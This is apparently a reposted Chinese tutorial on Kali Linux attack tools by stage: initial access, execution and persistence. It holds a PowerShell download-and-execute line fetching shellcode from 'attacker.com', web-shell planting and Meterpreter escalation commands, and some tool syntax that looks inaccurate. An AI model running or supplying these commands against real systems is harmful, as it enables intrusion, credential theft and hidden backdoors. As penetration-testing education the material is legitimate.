一、Initial Access(初始访问)

image-20260126192745235

图中展示的是 Kali Linux 系统中“初始访问”(直翻,翻译不对的地方,欢迎大佬指正)分类下的 6 款核心渗透测试工具,它们主要用于钓鱼攻击、命令注入、DNS 重绑定、漏洞利用框架与数据库映射等任务。这些工具在红队演练、安全评估和员工安全意识测试中发挥关键作用。

(一)commix

作用:自动化检测和利用 Web 应用程序中的命令注入漏洞。
功能

  • 支持多种注入模式:GET、POST、Cookie、HTTP 头等。

  • 内置大量 payload,覆盖 Linux、Windows、macOS 等系统。

  • 提供交互式 shell、文件读写、系统命令执行等功能。

  • 可生成报告,辅助漏洞修复与安全审计。
    常用命令

  • 检测目标 URL:

    commix -u "http://example.com/page?id=1"
    
  • 指定注入参数:

    commix -u "http://example.com/page" --data "username=admin&password=123"
    

(二)dns-rebind

作用:执行 DNS 重绑定攻击,绕过同源策略,访问内部网络或私有 IP。
功能

  • 控制恶意 DNS 服务器,返回不同 IP 地址(如公网 IP → 内网 IP)。

  • 利用浏览器仅校验域名的特性,突破同源策略。

  • 可用于攻击智能家居设备、路由器等 IoT 设备。
    常用命令

  • 启动服务:

    dns-rebind
    
  • 自定义 DNS 响应:

    dns-rebind -d example.com -i 192.168.1.1
    

(三)gophish

作用:开源网络钓鱼测试框架,用于模拟钓鱼邮件和网页。
功能

  • 提供 Web 界面,支持创建钓鱼模板、导入目标邮箱、发送邮件。

  • 跟踪用户行为:是否打开邮件、点击链接、提交数据。

  • 支持附件发送、HTML 模板、跟踪图片、Webhook 集成。
    常用命令

  • 启动 Gophish:

    gophish
    
  • 访问 Web 界面:

    http://127.0.0.1:3333
    

(四)metasploit-framework

作用:最流行的渗透测试框架,提供漏洞利用、payload 生成、后渗透功能。
功能

  • 模块化设计:包含 exploit、payload、encoder、nops 等模块。

  • 支持多种平台:Windows、Linux、macOS、Android 等。

  • 可扩展性强,社区贡献大量模块。
    常用命令

  • 启动 msfconsole:

    msfconsole
    
  • 搜索漏洞模块:

    search cve:2024-1234
    
  • 使用模块:

    use exploit/multi/handler
    

(五)setoolkit

作用:社会工程学工具包,用于模拟钓鱼攻击、木马生成、凭证窃取。
功能

  • 钓鱼网站克隆:复制合法网站页面,诱导用户输入凭证。

  • 木马生成:生成 Windows、Linux、macOS 可执行文件。

  • 电子邮件攻击:发送钓鱼邮件,诱导用户点击链接。
    常用命令

  • 启动工具:

    setoolkit
    
  • 选择攻击类型:

    1) 社会工程学攻击
    2) 钓鱼网站攻击
    

(六)sqlmap

作用:自动化 SQL 注入工具,检测和利用 SQL 注入漏洞。
功能

  • 支持多种数据库:MySQL、PostgreSQL、Oracle、SQL Server 等。

  • 提供数据提取、文件读写、命令执行、数据库枚举等功能。

  • 支持布尔盲注、时间盲注、报错注入等多种注入技术。
    常用命令

  • 检测目标 URL:

    sqlmap -u "http://example.com/page?id=1"
    
  • 获取数据库列表:

    sqlmap -u "http://example.com/page?id=1" --dbs
    
  • 获取当前数据库用户:

    sqlmap -u "http://example.com/page?id=1" --current-user
    

总结

这 6 款工具覆盖了从Web 漏洞利用(commix、sqlmap)*到*社会工程学攻击(gophish、setoolkit),再到网络层攻击(dns-rebind)综合渗透框架(metasploit)的完整攻击链。它们是安全人员进行红队演练、漏洞验证和安全培训的核心工具集。

二、Execution(执行)

image-20260126193535261

这张图片展示了 Kali Linux 中“执行”工具。它们主要用于在已经攻陷目标系统后,进行权限维持、信息收集和横向移动。

以下是这两个工具的详细分析:

(一) Metasploit Framework

作用

它是全球最领先的渗透测试开源框架,主要用于开发、测试和利用漏洞代码。在实战中,它常用于获取初始立足点(Initial Foothold)以及通过 Meterpreter 进行强大的后渗透控制。

功能

  • 漏洞利用:拥有庞大的漏洞数据库( exploits),支持 Windows、Linux、Android 等多种平台。
  • 载荷生成:使用 msfvenom 生成免杀或特定格式的恶意文件(如 .exe, .war, .apk)。
  • 后渗透模块 (Post Modules):在获取 shell 后,自动执行如凭证抓取、 Screenshots、键盘记录、权限提升等操作。
  • Meterpreter:一种高级的、动态可扩展的载荷,允许攻击者在受控主机上执行复杂的命令而很少写入磁盘,难以被检测。

常用命令

  1. 启动与搜索:

    • msfconsole:启动 Metasploit 控制台。
    • search [关键词]:搜索漏洞模块(例如 search eternalblue)。
  2. 模块配置:

    • use [模块路径]:选择攻击模块(例如 use exploit/windows/smb/ms17_010)。
    • show options:查看需要配置的参数(如 RHOSTS, LHOST)。
    • set RHOSTS 192.168.1.100:设置目标 IP。
    • set LHOST 192.168.1.200:设置攻击者 IP(回连地址)。
    • exploit:执行攻击。
  3. Meterpreter 交互

    (攻击成功后进入):

    • sysinfo:查看目标系统信息。
    • shellexecute -c:获取系统命令行。
    • upload/download:上传或下载文件。
    • getsystem:尝试提权。
    • background:将当前会话放入后台。

(二)PowerSploit

作用

这是一个基于 PowerShell 的开源渗透测试框架,专为 Windows 环境设计。它的核心理念是“无文件攻击”,利用 Windows 自带的 PowerShell 解释器执行攻击代码,从而绕过传统的杀毒软件检测。

功能

  • 隐蔽性强:直接在内存中执行代码,不落地生成文件,难以被传统 AV 查杀。
  • 凭证窃取:集成 Mimikatz 功能,可从内存中抓取 Windows 登录密码、哈希和 Kerberos 票据。
  • 权限维持:提供多种注册表、WMI 等持久化后门技术。
  • 脚本化攻击:提供了一大堆现成的 PowerShell 脚本模块,覆盖了从侦察到数据窃取的全过程。

常用命令

通常在已经获得的 PowerShell 会话(或通过 IEX 加载)中使用:

  1. 加载脚本

    (绕过执行策略):

    powershell.exe -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/PowerSploit/CodeExecution/Invoke-Shellcode.ps1')"
    
命令片段 含义与作用
powershell.exe 调用 Windows 自带的 PowerShell 解释器。
-ep bypass -ep-ExecutionPolicy 的缩写。bypass 意为“绕过”。 作用:绕过 PowerShell 的执行策略限制。默认情况下,Windows 禁止运行未签名的脚本,这个参数强制允许运行。
-c -c-Command 的缩写。 作用:后面跟随的字符串将作为 PowerShell 命令直接执行。
IEX IEXInvoke-Expression 的别名。 作用:执行括号内的字符串内容(即下载下来的代码),使其在内存中运行。
(New-Object Net.WebClient) 创建一个 .NET 网络客户端对象。 作用:用于访问网络,下载文件。
.DownloadString('URL') WebClient 的一个方法。 作用:从指定的 URL 地址下载文本内容(这里是 PowerShell 脚本代码)。

这条命令的执行逻辑可以概括为以下三步:

  • 下载:利用 WebClient 组件,向远程服务器 http://attacker.com 发起请求,下载路径为 /PowerSploit/CodeExecution/Invoke-Shellcode.ps1 的脚本文件。

  • 加载:将下载下来的脚本代码保存在计算机的内存(RAM)中,而不是保存为硬盘上的 .ps1 文件。

  • 执行:使用 IEX 命令立即运行内存中的代码。

攻击者使用这种手法主要有两个核心优势:

  • 无文件落地(Fileless Attack)
    传统的病毒会在硬盘上生成 .exe.dll 文件,容易被杀毒软件扫描到。这条命令全程在内存中操作,硬盘上不留痕迹,使得事后取证和查杀变得非常困难。
  • 利用白名单机制
    命令中调用的 powershell.exeWebClient 都是 Windows 系统自带的合法程序(白名单程序)。杀毒软件很难拦截这些系统组件,否则会导致系统崩溃。
  1. 常用攻击模块:
  • Invoke-Mimikatz:抓取系统内存中的明文密码和哈希。
  • Get-Keystrokes:记录键盘输入。
  • Invoke-Shellcode:注入 Shellcode。
  • Get-GPPPassword:从域控制器抓取组策略首选项(GPP)中保存的密码。
  • Invoke-WmiCommand:利用 WMI 执行远程命令。

总结

  • Metasploit 是“大炮”,用于打破大门并提供一个功能全面的通用控制台。
  • PowerSploit 是“手术刀”,通常在进入大门(或配合 Metasploit 的 Meterpreter)后,用于在 Windows 环境中进行精细、隐蔽的侦察和权限窃取。

三、Presistence(持久化)

image-20260126194713638

图中展示的是 Kali Linux 系统中三个常用于Web 渗透测试与后门控制的工具,它们主要用于在攻陷 Web 服务器后,维持访问权限、执行命令、管理文件和进行内网渗透。

(一)laudanum

作用:Laudanum 是一个 Web Shell 集合工具,用于在目标 Web 服务器上部署预编写的后门脚本。
功能

  • 支持多种脚本语言:包含 PHP、ASP、ASP.NET、JSP、ColdFusion 等多种 Web Shell 模板。

  • 快速部署:可一键生成包含数据库操作、文件管理、命令执行、代理功能的 Web Shell。

  • 隐蔽性强:部分脚本设计用于绕过简单 WAF(Web 应用防火墙)检测。

  • WordPress 插件支持:提供专门用于 WordPress 网站的后门插件模板。
    常用命令

  • 查看模板目录:

    ls /usr/share/laudanum/
    
  • 生成 PHP Web Shell:

    cp /usr/share/laudanum/php/cmd.php /var/www/html/shell.php
    
  • 生成带密码的 PHP Shell:

    cp /usr/share/laudanum/php/cmdpasswd.php /var/www/html/shell.php
    

(二)webshells

作用:Webshells 是一个 Web Shell 工具包,提供多种编码和通信方式的 Web Shell 脚本,用于绕过安全检测并维持访问。
功能

  • 多种通信方式:支持通过 Cookie、User-Agent、Referer 等 HTTP 头字段传输命令,避开日志检测。

  • 编码混淆:支持 Base64、Hex、ROT13 等编码方式,隐藏真实命令内容。

  • 小体积、高隐蔽性:脚本代码精简,不易被杀毒软件识别。

  • 支持 PHP、ASP、JSP 等多种语言。
    常用命令

  • 生成通过 Cookie 传输命令的 Web Shell:

    webshells -t cookie -o shell.php
    
  • 生成带密码验证的 Web Shell:

    webshells -p mypassword -o shell.php
    
  • 查看所有可用选项:

    webshells -h
    

(三)weevely

作用:Weevely 是一个基于 Python 的 PHP Web Shell 工具,专为在 Linux/Unix 系统上进行隐蔽远程控制而设计。
功能

  • 模块化设计:内置文件管理、数据库访问、系统命令执行、端口扫描、代理转发等模块。

  • 隐蔽通信:使用 HTTP 协议通信,支持混淆和加密,流量特征低。

  • 交互式终端:提供类似本地 shell 的交互体验。

  • 审计功能:可审计 PHP 配置、SUID/SGID 文件、系统权限等。
    常用命令

  • 生成 Web Shell:

    weevely generate mypassword /var/www/html/shell.php
    
  • 连接 Web Shell:

    weevely http://target.com/shell.php mypassword
    
  • 在 Weevely 会话中执行命令:

    • :file_ls /var/www/html:列出目录文件。
    • :shell whoami:执行系统命令。
    • :audit_suidsgid:查找 SUID/SGID 文件。
    • :sql_console:启动数据库控制台。

总结

这三个工具在 Kali Linux 中均属于 Web 渗透测试的“后渗透”阶段工具:

  • laudanum 适合快速生成多种语言的 Web Shell 模板。
  • webshells 适合需要绕过 WAF 或日志检测的场景。
  • weevely 适合在 Linux 环境下进行深度控制和系统审计。

它们共同构成了 Web 渗透测试中“权限维持”和“后门控制”的核心工具链。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/1220595.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!